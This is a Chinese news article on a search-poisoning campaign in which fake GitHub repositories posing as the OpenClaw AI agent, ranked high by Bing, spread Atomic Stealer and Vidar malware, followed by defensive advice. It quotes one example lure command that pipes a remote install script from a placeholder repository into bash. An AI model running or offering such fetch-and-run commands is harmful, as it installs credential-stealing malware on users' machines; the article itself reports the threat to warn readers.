最新消息:关注人工智能 AI赋能新媒体运营

黑客利用AI推荐机制诱导用户安装恶意OpenClaw插件,必应搜索遭波及

科技资讯 admin 浏览

必应AI搜索被黑客“投毒”,假OpenClaw正在诱导用户下载木马

最近,不少开发者和AI爱好者在使用微软必应(Bing)搜索“OpenClaw”时,发现搜索结果顶部出现了几个看似正规的GitHub项目链接——点进去,页面设计专业,README写得详尽,甚至还有使用教程和截图。可一旦按照提示在终端运行脚本,或下载“OpenClaw_x64.exe”文件,你的电脑就可能已被悄然入侵。

安全公司Huntress在调查中确认,这并非偶然误报,而是一场有组织的“搜索污染”攻击。黑客团队伪造了多个GitHub组织,复制了真实OpenClaw项目的代码结构,再通过刷星、刷提交记录、伪造文档等方式,让这些恶意项目在搜索引擎中获得高权重推荐。而必应AI的智能推荐系统,未能识别这些伪装,反而把它们推到了搜索结果的前三位。

这不是普通的钓鱼链接。OpenClaw本身是一款功能强大的开源AI智能体,能读取本地文件、收发邮件、调用API、连接数据库——这些权限,正是黑客梦寐以求的“后门钥匙”。攻击者正是利用了用户对这个工具的信任,把恶意代码包装成“官方升级版”或“增强功能包”。

Mac用户注意:一个命令,电脑就变“肉鸡”

针对macOS用户,黑客搭建的虚假页面会诱导你复制并执行类似这样的命令:

curl -fsSL https://raw.githubusercontent.com/xxx/OpenClaw/main/install.sh | bash

这个脚本表面看起来是安装依赖和配置环境,实则会悄悄下载并运行名为“Atomic Stealer”的窃密程序。它能抓取浏览器保存的密码、加密货币钱包、SSH密钥、剪贴板内容,甚至能截取屏幕截图。更可怕的是,它会自动清理日志,让系统自带的活动监视器难以发现异常。

Windows用户小心:那个.exe文件,不是你想象的那样

Windows用户收到的“礼物”更直接——一个名为“OpenClaw_x64.exe”的可执行文件。双击后,程序看似无反应,实则已在后台启动。它会加载Vidar窃密木马,目标直指:Chrome、Firefox、Edge的登录凭证、Discord令牌、Steam账户、FTP密码、甚至企业邮箱的OAuth令牌。

更隐蔽的是,它还会安装GhostSocks代理模块,把你的电脑变成一个“跳板节点”。黑客可以利用你的IP地址和网络带宽,发起DDoS攻击、访问被封锁的网站,甚至进行洗钱交易。而你,可能直到宽带异常、被ISP警告,甚至被警方传唤,才意识到问题出在自己身上。

为什么只有必应中招?谷歌、百度都没事?

目前,Huntress和多位安全研究员均未在谷歌搜索、百度搜索中发现类似污染案例。原因可能在于:必应AI的推荐机制更依赖实时内容分析和GitHub元数据,而谷歌的搜索算法更偏向权威站点、历史信誉和用户点击行为。简单说,黑客能“刷”必应,但刷不了谷歌的长期信任体系。

不过,这不代表其他搜索引擎就绝对安全。一旦攻击者摸清了算法逻辑,类似的攻击可能蔓延。目前,微软已收到报告,但尚未公开回应或下架相关链接。

你该怎么做?别再靠搜索“一键安装”

如果你正在寻找OpenClaw,或者任何类似的AI智能体工具,请记住:

  • 只从官方GitHub仓库下载:OpenClaw官方仓库是 https://github.com/OpenClaw,其他带“Enhanced”“Pro”“Latest”字样的都是假的。
  • 永远不要直接运行网络脚本:任何让你“curl | bash”或“wget | sh”的安装方式,都是高危信号。
  • 检查文件签名:Windows的.exe文件,右键→属性→数字签名,看是否来自可信开发者。Mac的安装包,用“终端”运行“spctl --assess --verbose”验证。
  • 用沙盒或虚拟机测试:不确定的程序,先在VirtualBox或UTM里跑一遍,别直接在主系统运行。

黑客不靠技术突破,靠的是你的信任。你越相信“搜索结果第一就是最靠谱”,就越容易中招。别让AI的推荐,替你做了本该你亲自判断的决定。

最新动态:OpenClaw官方已发布安全声明

2024年6月15日,OpenClaw官方团队在GitHub发布紧急公告,明确指出:

“我们从未发布过任何.exe安装包,也从未授权任何第三方分发渠道。所有非官方仓库均为恶意仿冒。请勿下载、运行任何非来自 github.com/OpenClaw 的代码。”

目前,GitHub已对多个伪造仓库采取封禁措施,但仍有大量镜像和缓存页面在互联网上流转。建议用户手动清除浏览器缓存,并检查系统中是否存在名为“Atomic Stealer”或“Vidar”的进程。

安全不是靠软件自动保护的,而是靠你每一次点击前的那三秒思考。